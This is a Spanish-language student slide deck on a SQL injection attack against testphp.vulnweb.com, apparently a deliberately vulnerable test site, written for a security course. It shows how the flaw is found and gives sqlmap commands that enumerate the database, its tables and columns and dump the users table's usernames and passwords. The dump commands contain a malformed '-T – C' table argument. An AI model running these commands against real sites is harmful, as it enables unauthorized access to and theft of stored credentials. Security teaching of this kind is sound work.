Especialización en
Seguridad Informática
Ataque por inyección de código SQL a
sitio Web
JOSÉ ALFREDO RAMÍREZ PRADA
Espinal, Septiembre de 2014
Ataque a sitio Web http://testphp.vulnweb.com
Realizar un ataque a la base de datos del sitio
http://testphp.vulnweb.com, con lo cual se debe obtener toda la
información sobre la base de datos por ejemplo servidor de BD y
versión, nombre de la base de datos, nombre de las tablas, información
de las tablas, información de las columnas, etc.
Se inicia el ataque en la pagina Web, por ejemplo se introduce una
comilla en el campo “Search” del formulario «Browse artists",
seguidamente en la direccion URL despues del signo igual se escribe
una comilla sencilla (´) y observamos un mensaje de error SQL.
Ataque a sitio Web http://testphp.vulnweb.com
Identificada la vulnerabilidad, podemos atacar por medio de la consola
de comando de Windows, ubicados en el directorio C:\sqlmap
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db
Se confirma la vulnerabilidad y
sqlmap ha sido capaz de detectar
el motor de base de datos MySQL
5.0.11 y el servidor Web PHP
5.3.10, el nombre de la base de
datos ‘ACUART'.
Ataque a sitio Web http://testphp.vulnweb.com
Seguidamente podemos identificar las tablas de la Base de Datos por medio del
comando:
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
Ataque a sitio Web http://testphp.vulnweb.com
una vez identificada la tabla (users) podremos identificar información de las
columnas, correspondientemente con los siguientes comandos:
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
Ataque a sitio Web http://testphp.vulnweb.com
una vez identificadas las columnas de la tabla procedemos a verificar la información
de los campos “uname, pass, name” de la tabla users,
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
Ataque a sitio Web http://testphp.vulnweb.com
De esta forma obtenemos toda la información de la base de datos del sitio Web.
Ataque a sitio Web http://testphp.vulnweb.com
Especialización en
Seguridad Informática